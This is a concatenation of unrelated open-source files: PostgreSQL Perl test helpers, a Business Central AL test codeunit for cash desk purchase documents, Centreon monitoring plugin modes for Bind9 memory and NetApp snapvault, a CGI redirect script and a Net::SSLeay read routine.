$result ne '' ? split(qr/\|/, $result, -1) : ('',) x scalar(@columns);
return \%val;
}
=pod
=item $node->slot(slot_name)
Return hash-ref of replication slot data for the named slot, or a hash-ref with
all values '' if not found. Does not differentiate between null and empty string
for fields; no field is ever undef.
The restart_lsn and confirmed_flush_lsn fields are returned verbatim, and also
as a 2-list of [highword, lowword] integer. Since we rely on Perl 5.8.8 we can't
"use bigint", it's from 5.20, and we can't assume we have Math::Bigint from CPAN
either.
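A usage sketch (the slot name is hypothetical):
  my $slot_info = $node->slot('test_slot');
  print "restart_lsn: $slot_info->{restart_lsn}\n"
      if $slot_info->{slot_type} ne '';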
=cut
sub slot
{
my ($self, $slot_name) = @_;
my @columns = (
'plugin', 'slot_type', 'datoid', 'database',
'active', 'active_pid', 'xmin', 'catalog_xmin',
'restart_lsn');
return $self->query_hash(
'postgres',
"SELECT __COLUMNS__ FROM pg_catalog.pg_replication_slots WHERE slot_name = '$slot_name'",
@columns);
}
=pod
=item $node->pg_recvlogical_upto(self, dbname, slot_name, endpos, timeout_secs, ...)
Invoke pg_recvlogical to read from slot_name on dbname until LSN endpos, which
corresponds to pg_recvlogical --endpos. Gives up after timeout (if nonzero).
Disallows pg_recvlogical from internally retrying on error by passing --no-loop.
Plugin options are passed as additional keyword arguments.
If called in scalar context, returns stdout, and die()s on timeout or nonzero return.
If called in array context, returns a tuple of (retval, stdout, stderr, timeout).
timeout is the IPC::Run::Timeout object whose is_expired method can be tested
to check for timeout. retval is undef on timeout.
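An illustrative scalar-context call (the slot name is an assumption; the plugin
options shown are the usual test_decoding ones):
  my $endpos = $node->safe_psql('postgres', 'SELECT pg_current_wal_lsn()');
  my $out = $node->pg_recvlogical_upto('postgres', 'test_slot', $endpos, 180,
      'include-xids' => '0', 'skip-empty-xacts' => '1');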
=cut
sub pg_recvlogical_upto
{
my ($self, $dbname, $slot_name, $endpos, $timeout_secs, %plugin_options)
= @_;
local %ENV = $self->_get_env();
my ($stdout, $stderr);
my $timeout_exception = 'pg_recvlogical timed out';
croak 'slot name must be specified' unless defined($slot_name);
croak 'endpos must be specified' unless defined($endpos);
my @cmd = (
$self->installed_command('pg_recvlogical'),
'-S', $slot_name, '--dbname', $self->connstr($dbname));
push @cmd, '--endpos', $endpos;
push @cmd, '-f', '-', '--no-loop', '--start';
while (my ($k, $v) = each %plugin_options)
{
croak "= is not permitted to appear in replication option name"
if ($k =~ qr/=/);
push @cmd, "-o", "$k=$v";
}
my $timeout;
$timeout =
IPC::Run::timeout($timeout_secs, exception => $timeout_exception)
if $timeout_secs;
my $ret = 0;
do
{
local $@;
eval {
IPC::Run::run(\@cmd, ">", \$stdout, "2>", \$stderr, $timeout);
$ret = $?;
};
my $exc_save = $@;
if ($exc_save)
{
# IPC::Run::run threw an exception. re-throw unless it's a
# timeout, which we'll handle by testing is_expired
die $exc_save
if (blessed($exc_save) || $exc_save !~ qr/$timeout_exception/);
$ret = undef;
die "Got timeout exception '$exc_save' but timer not expired?!"
unless $timeout->is_expired;
die
"$exc_save waiting for endpos $endpos with stdout '$stdout', stderr '$stderr'"
unless wantarray;
}
};
$stdout =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
$stderr =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
if (wantarray)
{
return ($ret, $stdout, $stderr, $timeout);
}
else
{
die
"pg_recvlogical exited with code '$ret', stdout '$stdout' and stderr '$stderr'"
if $ret;
return $stdout;
}
}
=pod
=back
=cut
1;
| 24.771374 | 141 | 0.68566 |
73ea19f560c64da53d8c31a8e25c81afb8e0c6c9 | 12,739 | al | Perl | Apps/CZ/CashDeskLocalization/test/Src/CashDeskPurchase.Codeunit.al | waldo1001/ALAppExtensions | 935155845bf45b631d1c34b6bcd5aec54308d50f | [
"MIT"
] | 337 | 2019-05-07T06:04:40.000Z | 2022-03-31T10:07:42.000Z | Apps/CZ/CashDeskLocalization/test/Src/CashDeskPurchase.Codeunit.al | snu-development/ALAppExtensions | 371a27fe48483be776642dde19483a87ae27289c | [
"MIT"
] | 14,850 | 2019-05-07T06:04:27.000Z | 2022-03-31T19:53:28.000Z | Apps/CZ/CashDeskLocalization/test/Src/CashDeskPurchase.Codeunit.al | snu-development/ALAppExtensions | 371a27fe48483be776642dde19483a87ae27289c | [
"MIT"
] | 374 | 2019-05-09T10:08:14.000Z | 2022-03-31T17:48:32.000Z | codeunit 148072 "Cash Desk Purchase CZP"
{
Subtype = Test;
TestPermissions = Disabled;
trigger OnRun()
begin
// [FEATURE] [Cash Desk] [Purchase]
isInitialized := false;
end;
var
CashDeskCZP: Record "Cash Desk CZP";
PaymentMethod: Record "Payment Method";
CashDeskUserCZP: Record "Cash Desk User CZP";
LibraryCashDeskCZP: Codeunit "Library - Cash Desk CZP";
LibraryRandom: Codeunit "Library - Random";
LibraryPurchase: Codeunit "Library - Purchase";
LibraryCashDocumentCZP: Codeunit "Library - Cash Document CZP";
CashDocumentActionCZP: Enum "Cash Document Action CZP";
isInitialized: Boolean;
local procedure Initialize()
var
LibraryTestInitialize: Codeunit "Library - Test Initialize";
begin
LibraryTestInitialize.OnTestInitialize(Codeunit::"Cash Desk Purchase CZP");
LibraryRandom.Init();
if isInitialized then
exit;
LibraryTestInitialize.OnBeforeTestSuiteInitialize(Codeunit::"Cash Desk Purchase CZP");
LibraryCashDeskCZP.CreateCashDeskCZP(CashDeskCZP);
LibraryCashDeskCZP.SetupCashDeskCZP(CashDeskCZP, false);
LibraryCashDeskCZP.CreateCashDeskUserCZP(CashDeskUserCZP, CashDeskCZP."No.", true, true, true);
isInitialized := true;
Commit();
LibraryTestInitialize.OnAfterTestSuiteInitialize(Codeunit::"Cash Desk Purchase CZP");
end;
[Test]
procedure CreatingWithdrawalCashDocumentFromPurchaseInvoice()
begin
// [SCENARIO] Create Cash Document in Purchase Invoice
WithdrawalCashDocumentFromPurchaseInvoice(CashDocumentActionCZP::Create);
end;
[Test]
procedure ReleasingWithdrawalCashDocumentFromPurchaseInvoice()
begin
// [SCENARIO] Release Cash Document in Purchase Invoice
WithdrawalCashDocumentFromPurchaseInvoice(CashDocumentActionCZP::Release);
end;
[Test]
procedure PostingWithdrawalCashDocumentFromPurchaseInvoice()
begin
// [SCENARIO] Post Cash Document in Purchase Invoice
WithdrawalCashDocumentFromPurchaseInvoice(CashDocumentActionCZP::Post);
end;
local procedure WithdrawalCashDocumentFromPurchaseInvoice(CashDocumentActionCZP: Enum "Cash Document Action CZP")
var
CashDocumentHeaderCZP: Record "Cash Document Header CZP";
CashDocumentLineCZP: Record "Cash Document Line CZP";
PurchInvHeader: Record "Purch. Inv. Header";
PurchaseHeader: Record "Purchase Header";
PurchaseLine: Record "Purchase Line";
PostedCashDocumentHdrCZP: Record "Posted Cash Document Hdr. CZP";
PostedCashDocumentLineCZP: Record "Posted Cash Document Line CZP";
PostDocNo: Code[20];
begin
Initialize();
// [GIVEN] New Payment method is created and used in Purchase Invoice
LibraryCashDocumentCZP.CreatePaymentMethod(PaymentMethod, CashDeskCZP."No.", CashDocumentActionCZP);
CreatePurchInvoice(PurchaseHeader, PurchaseLine);
ModifyPaymentMethodInPurchaseDocument(PurchaseHeader, PaymentMethod);
// [WHEN] Post Purchase Invoice
PostDocNo := PostPurchaseDocument(PurchaseHeader);
// [THEN] (Posted) Cash Document Withdrawal exists and has correct amount
PurchInvHeader.Get(PostDocNo);
PurchInvHeader.CalcFields("Amount Including VAT");
case CashDocumentActionCZP of
PaymentMethod."Cash Document Action CZP"::Create,
PaymentMethod."Cash Document Action CZP"::Release:
begin
CashDocumentHeaderCZP.SetRange("Cash Desk No.", CashDeskCZP."No.");
CashDocumentHeaderCZP.SetRange("Document Type", CashDocumentHeaderCZP."Document Type"::Withdrawal);
if CashDocumentActionCZP = PaymentMethod."Cash Document Action CZP"::Create then
CashDocumentHeaderCZP.SetRange(Status, CashDocumentHeaderCZP.Status::Open)
else
CashDocumentHeaderCZP.SetRange(Status, CashDocumentHeaderCZP.Status::Released);
CashDocumentHeaderCZP.SetRange("Posting Date", PurchInvHeader."Posting Date");
CashDocumentHeaderCZP.FindLast();
CashDocumentLineCZP.SetRange("Cash Desk No.", CashDocumentHeaderCZP."Cash Desk No.");
CashDocumentLineCZP.SetRange("Cash Document No.", CashDocumentHeaderCZP."No.");
CashDocumentLineCZP.FindFirst();
CashDocumentLineCZP.TestField("Account Type", CashDocumentLineCZP."Account Type"::Vendor);
CashDocumentLineCZP.TestField("Account No.", PurchInvHeader."Buy-from Vendor No.");
CashDocumentLineCZP.TestField(Amount, PurchInvHeader."Amount Including VAT");
CashDocumentLineCZP.TestField("Applies-To Doc. Type", CashDocumentLineCZP."Applies-To Doc. Type"::Invoice);
CashDocumentLineCZP.TestField("Applies-To Doc. No.", PurchInvHeader."No.");
end;
PaymentMethod."Cash Document Action CZP"::Post:
begin
PostedCashDocumentHdrCZP.SetRange("Cash Desk No.", CashDeskCZP."No.");
PostedCashDocumentHdrCZP.SetRange("Document Type", PostedCashDocumentHdrCZP."Document Type"::Withdrawal);
PostedCashDocumentHdrCZP.SetRange("Posting Date", PurchInvHeader."Posting Date");
PostedCashDocumentHdrCZP.FindLast();
PostedCashDocumentLineCZP.SetRange("Cash Desk No.", PostedCashDocumentHdrCZP."Cash Desk No.");
PostedCashDocumentLineCZP.SetRange("Cash Document No.", PostedCashDocumentHdrCZP."No.");
PostedCashDocumentLineCZP.FindFirst();
PostedCashDocumentLineCZP.TestField("Account Type", PostedCashDocumentLineCZP."Account Type"::Vendor);
PostedCashDocumentLineCZP.TestField("Account No.", PurchInvHeader."Buy-from Vendor No.");
PostedCashDocumentLineCZP.TestField(Amount, PurchInvHeader."Amount Including VAT");
end;
end;
end;
[Test]
procedure CreatingReceiptCashDocumentFromPurchaseCrMemo()
begin
// [SCENARIO] Create Cash Documents in Purchase Credit Memo
ReceiptCashDocumentFromPurchaseCrMemo(CashDocumentActionCZP::Create);
end;
[Test]
procedure ReleasingReceiptCashDocumentFromPurchaseCrMemo()
begin
// [SCENARIO] Release Cash Documents in Purchase Credit Memo
ReceiptCashDocumentFromPurchaseCrMemo(CashDocumentActionCZP::Release);
end;
[Test]
procedure PostingReceiptCashDocumentFromPurchaseCrMemo()
begin
// [SCENARIO] Post Cash Documents in Purchase Credit Memo
ReceiptCashDocumentFromPurchaseCrMemo(CashDocumentActionCZP::Post);
end;
local procedure ReceiptCashDocumentFromPurchaseCrMemo(CashDocumentActionCZP: Enum "Cash Document Action CZP")
var
CashDocumentHeaderCZP: Record "Cash Document Header CZP";
CashDocumentLineCZP: Record "Cash Document Line CZP";
PurchCrMemoHdr: Record "Purch. Cr. Memo Hdr.";
PurchaseHeader: Record "Purchase Header";
PurchaseLine: Record "Purchase Line";
PostedCashDocumentHdrCZP: Record "Posted Cash Document Hdr. CZP";
PostedCashDocumentLineCZP: Record "Posted Cash Document Line CZP";
PostDocNo: Code[20];
begin
Initialize();
// [GIVEN] New Payment method is created and used in Purchase Credit Memo
LibraryCashDocumentCZP.CreatePaymentMethod(PaymentMethod, CashDeskCZP."No.", CashDocumentActionCZP);
CreatePurchCreditMemo(PurchaseHeader, PurchaseLine);
ModifyPaymentMethodInPurchaseDocument(PurchaseHeader, PaymentMethod);
// [WHEN] Post Purchase Credit Memo
PostDocNo := PostPurchaseDocument(PurchaseHeader);
// [THEN] (Posted) Cash Document Receipt exists and has correct amount
PurchCrMemoHdr.Get(PostDocNo);
PurchCrMemoHdr.CalcFields("Amount Including VAT");
case CashDocumentActionCZP of
PaymentMethod."Cash Document Action CZP"::Create,
PaymentMethod."Cash Document Action CZP"::Release:
begin
CashDocumentHeaderCZP.SetRange("Cash Desk No.", CashDeskCZP."No.");
CashDocumentHeaderCZP.SetRange("Document Type", CashDocumentHeaderCZP."Document Type"::Receipt);
if CashDocumentActionCZP = PaymentMethod."Cash Document Action CZP"::Create then
CashDocumentHeaderCZP.SetRange(Status, CashDocumentHeaderCZP.Status::Open)
else
CashDocumentHeaderCZP.SetRange(Status, CashDocumentHeaderCZP.Status::Released);
CashDocumentHeaderCZP.SetRange("Posting Date", PurchCrMemoHdr."Posting Date");
CashDocumentHeaderCZP.FindLast();
CashDocumentLineCZP.SetRange("Cash Desk No.", CashDocumentHeaderCZP."Cash Desk No.");
CashDocumentLineCZP.SetRange("Cash Document No.", CashDocumentHeaderCZP."No.");
CashDocumentLineCZP.FindFirst();
CashDocumentLineCZP.TestField("Account Type", CashDocumentLineCZP."Account Type"::Vendor);
CashDocumentLineCZP.TestField("Account No.", PurchCrMemoHdr."Buy-from Vendor No.");
CashDocumentLineCZP.TestField(Amount, PurchCrMemoHdr."Amount Including VAT");
CashDocumentLineCZP.TestField("Applies-To Doc. Type", CashDocumentLineCZP."Applies-To Doc. Type"::"Credit Memo");
CashDocumentLineCZP.TestField("Applies-To Doc. No.", PurchCrMemoHdr."No.");
end;
PaymentMethod."Cash Document Action CZP"::Post:
begin
PostedCashDocumentHdrCZP.SetRange("Cash Desk No.", CashDeskCZP."No.");
PostedCashDocumentHdrCZP.SetRange("Document Type", PostedCashDocumentHdrCZP."Document Type"::Receipt);
PostedCashDocumentHdrCZP.SetRange("Posting Date", PurchCrMemoHdr."Posting Date");
PostedCashDocumentHdrCZP.FindLast();
PostedCashDocumentLineCZP.SetRange("Cash Desk No.", PostedCashDocumentHdrCZP."Cash Desk No.");
PostedCashDocumentLineCZP.SetRange("Cash Document No.", PostedCashDocumentHdrCZP."No.");
PostedCashDocumentLineCZP.FindFirst();
PostedCashDocumentLineCZP.TestField("Account Type", PostedCashDocumentLineCZP."Account Type"::Vendor);
PostedCashDocumentLineCZP.TestField("Account No.", PurchCrMemoHdr."Buy-from Vendor No.");
PostedCashDocumentLineCZP.TestField(Amount, PurchCrMemoHdr."Amount Including VAT");
end;
end;
end;
local procedure CreatePurchDocument(var PurchaseHeader: Record "Purchase Header"; var PurchaseLine: Record "Purchase Line";
DocumentType: Enum "Purchase Document Type"; Amount: Decimal)
var
Vendor: Record Vendor;
begin
LibraryPurchase.CreateVendor(Vendor);
LibraryPurchase.CreatePurchHeader(PurchaseHeader, DocumentType, Vendor."No.");
LibraryPurchase.CreatePurchaseLine(
PurchaseLine, PurchaseHeader, PurchaseLine.Type::"G/L Account", LibraryCashDocumentCZP.GetNewGLAccountNo(true), 1);
PurchaseLine.Validate("Direct Unit Cost", Amount);
PurchaseLine.Modify(true);
end;
local procedure CreatePurchCreditMemo(var PurchaseHeader: Record "Purchase Header"; var PurchaseLine: Record "Purchase Line")
begin
CreatePurchDocument(PurchaseHeader, PurchaseLine, PurchaseHeader."Document Type"::"Credit Memo", LibraryRandom.RandDecInRange(5000, 10000, 2));
end;
local procedure CreatePurchInvoice(var PurchaseHeader: Record "Purchase Header"; var PurchaseLine: Record "Purchase Line")
begin
CreatePurchDocument(PurchaseHeader, PurchaseLine, PurchaseHeader."Document Type"::Invoice, LibraryRandom.RandDecInRange(5000, 10000, 2));
end;
local procedure ModifyPaymentMethodInPurchaseDocument(var PurchaseHeader: Record "Purchase Header"; PaymentMethod: Record "Payment Method")
begin
PurchaseHeader.Validate("Payment Method Code", PaymentMethod.Code);
PurchaseHeader.Modify();
end;
local procedure PostPurchaseDocument(var PurchaseHeader: Record "Purchase Header"): Code[20]
begin
exit(LibraryPurchase.PostPurchaseDocument(PurchaseHeader, true, true));
end;
}
| 50.956 | 151 | 0.678546 |
eda534b51accd98f22eac6196ceed533c7cd7cec | 4,644 | pm | Perl | apps/bind9/web/mode/memoryusage.pm | bmareau/centreon-plugins | 377b2e75b36aaf0ea9c80f4530d1396c7f1c0802 | [
"Apache-2.0"
] | null | null | null | apps/bind9/web/mode/memoryusage.pm | bmareau/centreon-plugins | 377b2e75b36aaf0ea9c80f4530d1396c7f1c0802 | [
"Apache-2.0"
] | null | null | null | apps/bind9/web/mode/memoryusage.pm | bmareau/centreon-plugins | 377b2e75b36aaf0ea9c80f4530d1396c7f1c0802 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2019 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
package apps::bind9::web::mode::memoryusage;
use base qw(centreon::plugins::templates::counter);
use strict;
use warnings;
sub custom_usage_perfdata {
my ($self, %options) = @_;
$self->{output}->perfdata_add(label => 'used', unit => 'B',
value => $self->{result_values}->{used},
warning => $self->{perfdata}->get_perfdata_for_output(label => 'warning-' . $self->{label}, total => $self->{result_values}->{total}, cast_int => 1),
critical => $self->{perfdata}->get_perfdata_for_output(label => 'critical-' . $self->{label}, total => $self->{result_values}->{total}, cast_int => 1),
min => 0, max => $self->{result_values}->{total});
}
sub custom_usage_threshold {
my ($self, %options) = @_;
my $exit = $self->{perfdata}->threshold_check(value => $self->{result_values}->{prct_used}, threshold => [ { label => 'critical-' . $self->{label}, exit_litteral => 'critical' }, { label => 'warning-' . $self->{label}, exit_litteral => 'warning' } ]);
return $exit;
}
sub custom_usage_output {
my ($self, %options) = @_;
my ($total_size_value, $total_size_unit) = $self->{perfdata}->change_bytes(value => $self->{result_values}->{total});
my ($total_used_value, $total_used_unit) = $self->{perfdata}->change_bytes(value => $self->{result_values}->{used});
my ($total_free_value, $total_free_unit) = $self->{perfdata}->change_bytes(value => $self->{result_values}->{free});
my $msg = sprintf("Memory Total: %s Used: %s (%.2f%%) Free: %s (%.2f%%)",
$total_size_value . " " . $total_size_unit,
$total_used_value . " " . $total_used_unit, $self->{result_values}->{prct_used},
$total_free_value . " " . $total_free_unit, $self->{result_values}->{prct_free});
return $msg;
}
sub custom_usage_calc {
my ($self, %options) = @_;
$self->{result_values}->{total} = $options{new_datas}->{$self->{instance} . '_total'};
$self->{result_values}->{used} = $options{new_datas}->{$self->{instance} . '_used'};
$self->{result_values}->{free} = $self->{result_values}->{total} - $self->{result_values}->{used};
$self->{result_values}->{prct_used} = $self->{result_values}->{used} * 100 / $self->{result_values}->{total};
$self->{result_values}->{prct_free} = 100 - $self->{result_values}->{prct_used};
$self->{result_values}->{free} = $self->{result_values}->{total} - $self->{result_values}->{used};
return 0;
}
sub set_counters {
my ($self, %options) = @_;
$self->{maps_counters_type} = [
{ name => 'memory', type => 0 }
];
$self->{maps_counters}->{memory} = [
{ label => 'usage', set => {
key_values => [ { name => 'used' }, { name => 'total' } ],
closure_custom_calc => $self->can('custom_usage_calc'),
closure_custom_output => $self->can('custom_usage_output'),
closure_custom_perfdata => $self->can('custom_usage_perfdata'),
closure_custom_threshold_check => $self->can('custom_usage_threshold'),
}
},
];
}
sub new {
my ($class, %options) = @_;
my $self = $class->SUPER::new(package => __PACKAGE__, %options);
bless $self, $class;
$self->{version} = '1.0';
$options{options}->add_options(arguments => {
});
return $self;
}
sub manage_selection {
my ($self, %options) = @_;
my $result = $options{custom}->get_memory();
$self->{memory} = { used => $result->{in_use}, total => $result->{total_use} };
}
1;
__END__
=head1 MODE
Check bind memory usage.
=over 8
=item B<--warning-usage>
Warning threshold on memory usage (in percent of used memory).
=item B<--critical-usage>
Critical threshold on memory usage (in percent of used memory).
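For example (illustrative values, interpreted as percent of used memory):
  --warning-usage='80' --critical-usage='90'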
=back
=cut
| 35.450382 | 255 | 0.599914 |
edb260d41ca087866f4f7a11fab8d4ba2197325b | 375 | pl | Perl | cgi-bin/image/index.pl | labroo2/sgn | c8a1a10e4ac2104d82c5fd2d986f1688d01b20be | [
"MIT"
] | 39 | 2015-02-03T15:47:55.000Z | 2022-03-23T13:34:05.000Z | cgi-bin/image/index.pl | labroo2/sgn | c8a1a10e4ac2104d82c5fd2d986f1688d01b20be | [
"MIT"
] | 2,491 | 2015-01-07T05:49:17.000Z | 2022-03-31T15:31:05.000Z | cgi-bin/image/index.pl | labroo2/sgn | c8a1a10e4ac2104d82c5fd2d986f1688d01b20be | [
"MIT"
] | 20 | 2015-06-30T19:10:09.000Z | 2022-03-23T13:34:09.000Z | use CatalystX::GlobalContext qw( $c );
use strict;
use warnings;
use CGI;
use CXGN::DB::Connection;
use CXGN::Login;
my $q = CGI->new();
my $dbh = CXGN::DB::Connection->new();
my $login = CXGN::Login->new($dbh);
my $person_id = $login->has_session();
my ($image_id, $size) = ($q->param("image_id"), $q->param("size"));
print $q->redirect("/image/view/$image_id", 301);
| 19.736842 | 67 | 0.637333 |
ed5c30767c1acb44be339b4b3369f5e39584b24b | 782 | al | Perl | perl/vendor/lib/auto/Net/SSLeay/tcp_read_all.al | ifleeyo180/VspriteMoodleWebsite | 38baa924829c83808d2c87d44740ff365927a646 | [
"Apache-2.0"
] | null | null | null | perl/vendor/lib/auto/Net/SSLeay/tcp_read_all.al | ifleeyo180/VspriteMoodleWebsite | 38baa924829c83808d2c87d44740ff365927a646 | [
"Apache-2.0"
] | null | null | null | perl/vendor/lib/auto/Net/SSLeay/tcp_read_all.al | ifleeyo180/VspriteMoodleWebsite | 38baa924829c83808d2c87d44740ff365927a646 | [
"Apache-2.0"
] | null | null | null | # NOTE: Derived from blib\lib\Net\SSLeay.pm.
# Changes made here will be lost when autosplit is run again.
# See AutoSplit.pm.
package Net::SSLeay;
#line 617 "blib\lib\Net\SSLeay.pm (autosplit into blib\lib\auto\Net\SSLeay\tcp_read_all.al)"
sub tcp_read_all {
my ($how_much) = @_;
$how_much = 2000000000 unless $how_much;
my ($n, $got, $errs);
my $reply = '';
my $bsize = 0x10000;
while ($how_much > 0) {
$n = sysread(SSLCAT_S,$got, (($bsize < $how_much) ? $bsize : $how_much));
warn "Read error: $! ($n,$how_much)" unless defined $n;
last if !$n; # EOF
$how_much -= $n;
debug_read(\$reply, \$got) if $trace>1;
$reply .= $got;
}
return wantarray ? ($reply, $errs) : $reply;
}
# end of Net::SSLeay::tcp_read_all
1;
| 28.962963 | 93 | 0.608696 |
ed6fdc635ce483121e450034cfe91a8fb79ee3ca | 9,009 | pm | Perl | storage/netapp/ontap/snmp/mode/snapvaultusage.pm | centreon-lab/centreon-plugins | 68096c697a9e1baf89a712674a193d9a9321503c | [
"Apache-2.0"
] | null | null | null | storage/netapp/ontap/snmp/mode/snapvaultusage.pm | centreon-lab/centreon-plugins | 68096c697a9e1baf89a712674a193d9a9321503c | [
"Apache-2.0"
] | null | null | null | storage/netapp/ontap/snmp/mode/snapvaultusage.pm | centreon-lab/centreon-plugins | 68096c697a9e1baf89a712674a193d9a9321503c | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2022 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
package storage::netapp::ontap::snmp::mode::snapvaultusage;
use base qw(centreon::plugins::templates::counter);
use strict;
use warnings;
use centreon::plugins::templates::catalog_functions qw(catalog_status_threshold);
use Digest::MD5 qw(md5_hex);
sub custom_status_output {
my ($self, %options) = @_;
my $msg = 'status : ' . $self->{result_values}->{status} . ' [state : ' . $self->{result_values}->{state} . ']';
return $msg;
}
sub custom_status_calc {
my ($self, %options) = @_;
$self->{result_values}->{status} = $options{new_datas}->{$self->{instance} . '_svStatus'};
$self->{result_values}->{state} = $options{new_datas}->{$self->{instance} . '_svState'};
$self->{result_values}->{display} = $options{new_datas}->{$self->{instance} . '_display'};
return 0;
}
sub set_counters {
my ($self, %options) = @_;
$self->{maps_counters_type} = [
{ name => 'snapvault', type => 1, cb_prefix_output => 'prefix_snapvault_output', message_multiple => 'All snapvault usages are ok', skipped_code => { -10 => 1, -11 => 1 } }
];
$self->{maps_counters}->{snapvault} = [
{ label => 'status', threshold => 0, set => {
key_values => [ { name => 'svState' }, { name => 'svStatus' }, { name => 'display' } ],
closure_custom_calc => $self->can('custom_status_calc'),
closure_custom_output => $self->can('custom_status_output'),
closure_custom_perfdata => sub { return 0; },
closure_custom_threshold_check => \&catalog_status_threshold,
}
},
{ label => 'lag', set => {
key_values => [ { name => 'svLag' }, { name => 'display' } ],
output_template => 'lag : %s seconds',
perfdatas => [
{ label => 'lag', template => '%s', min => 0, unit => 's',
label_extra_instance => 1, instance_use => 'display' },
],
}
},
{ label => 'transfer-traffic', set => {
key_values => [ { name => 'svTotalTransMBs', per_second => 1 }, { name => 'display' } ],
output_template => 'transfer traffic : %s %s/s',
output_change_bytes => 1,
perfdatas => [
{ label => 'transfer_traffic', template => '%.2f',
unit => 'B/s', min => 0, label_extra_instance => 1, instance_use => 'display' },
],
}
},
{ label => 'transfer-succeed', display_ok => 0, set => {
key_values => [ { name => 'svTotalSuccesses' }, { name => 'display' } ],
output_template => 'transfer succeed : %s',
perfdatas => [
{ label => 'transfer_succeed', template => '%s', min => 0,
label_extra_instance => 1, instance_use => 'display' },
],
}
},
{ label => 'transfer-failed', display_ok => 0, set => {
key_values => [ { name => 'svTotalFailures' }, { name => 'display' } ],
output_template => 'transfer failed : %s',
perfdatas => [
{ label => 'transfer_failed', template => '%s', min => 0,
label_extra_instance => 1, instance_use => 'display' },
],
}
},
];
}
sub prefix_snapvault_output {
my ($self, %options) = @_;
return "Snapvault '" . $options{instance_value}->{display} . "' ";
}
sub new {
my ($class, %options) = @_;
my $self = $class->SUPER::new(package => __PACKAGE__, %options, statefile => 1);
bless $self, $class;
$options{options}->add_options(arguments => {
'filter-name:s' => { name => 'filter_name' },
'unknown-status:s' => { name => 'unknown_status', default => '' },
'warning-status:s' => { name => 'warning_status', default => '' },
'critical-status:s' => { name => 'critical_status', default => '' },
});
return $self;
}
sub check_options {
my ($self, %options) = @_;
$self->SUPER::check_options(%options);
$self->change_macros(macros => ['warning_status', 'critical_status', 'unknown_status']);
}
my $map_status = {
1 => 'idle', 2 => 'transferring', 3 => 'pending',
4 => 'aborting', 6 => 'quiescing', 7 => 'resyncing',
12 => 'paused',
};
my $map_state = {
1 => 'uninitialized', 2 => 'snapvaulted',
3 => 'brokenOff', 4 => 'quiesced',
5 => 'source', 6 => 'unknown', 7 => 'restoring',
};
my $mapping = {
svStatus => { oid => '.1.3.6.1.4.1.789.1.19.11.1.4', map => $map_status },
svState => { oid => '.1.3.6.1.4.1.789.1.19.11.1.5', map => $map_state },
svLag => { oid => '.1.3.6.1.4.1.789.1.19.11.1.6' }, # timeticks
svTotalSuccesses => { oid => '.1.3.6.1.4.1.789.1.19.11.1.7' },
svTotalFailures => { oid => '.1.3.6.1.4.1.789.1.19.11.1.9' },
svTotalTransMBs => { oid => '.1.3.6.1.4.1.789.1.19.11.1.11' },
};
sub manage_selection {
my ($self, %options) = @_;
my $oid_svOn = '.1.3.6.1.4.1.789.1.19.1.0';
my $snmp_result = $options{snmp}->get_leef(oids => [$oid_svOn]);
if (!defined($snmp_result->{$oid_svOn}) || $snmp_result->{$oid_svOn} != 2) {
$self->{output}->add_option_msg(short_msg => "snapvault is not turned on.");
$self->{output}->option_exit();
}
my $oid_svSrc = '.1.3.6.1.4.1.789.1.19.11.1.2';
my $oid_svDst = '.1.3.6.1.4.1.789.1.19.11.1.3';
$self->{snapvault} = {};
$snmp_result = $options{snmp}->get_multiple_table(oids => [{ oid => $oid_svSrc }, { oid => $oid_svDst }], return_type => 1, nothing_quit => 1);
foreach my $oid (keys %{$snmp_result}) {
next if ($oid !~ /^$oid_svSrc\.(.*)$/);
my $instance = $1;
my $name = $snmp_result->{$oid_svSrc . '.' . $instance} . '.' . $snmp_result->{$oid_svDst . '.' . $instance};
if (defined($self->{option_results}->{filter_name}) && $self->{option_results}->{filter_name} ne '' &&
$name !~ /$self->{option_results}->{filter_name}/) {
$self->{output}->output_add(long_msg => "skipping snapvault '" . $name . "'.", debug => 1);
next;
}
$self->{snapvault}->{$instance} = { display => $name };
}
if (scalar(keys %{$self->{snapvault}}) <= 0) {
$self->{output}->add_option_msg(short_msg => "No entry found.");
$self->{output}->option_exit();
}
$options{snmp}->load(oids => [
map($_->{oid}, values(%$mapping))
],
instances => [keys %{$self->{snapvault}}], instance_regexp => '^(.*)$');
$snmp_result = $options{snmp}->get_leef(nothing_quit => 1);
foreach (keys %{$self->{snapvault}}) {
my $result = $options{snmp}->map_instance(mapping => $mapping, results => $snmp_result, instance => $_);
$result->{svTotalTransMBs} *= 1024 * 1024;
$result->{svLag} = int($result->{svLag} / 100);
$self->{snapvault}->{$_} = { %{$self->{snapvault}->{$_}}, %$result };
}
$self->{cache_name} = "netapp_" . $self->{mode} . '_' . $options{snmp}->get_hostname() . '_' . $options{snmp}->get_port() . '_' .
(defined($self->{option_results}->{filter_counters}) ? md5_hex($self->{option_results}->{filter_counters}) : md5_hex('all')) . '_' .
(defined($self->{option_results}->{filter_name}) ? md5_hex($self->{option_results}->{filter_name}) : md5_hex('all'));
}
1;
__END__
=head1 MODE
Check snapvault usage.
=over 8
=item B<--filter-name>
Filter snapvault name (can be a regexp).
=item B<--unknown-status>
Set unknown threshold for status (Default: '').
You can use special variables like: %{state}, %{status}, %{display}
=item B<--warning-status>
Set warning threshold for status (Default: '').
You can use special variables like: %{state}, %{status}, %{display}
=item B<--critical-status>
Set critical threshold for status (Default: '').
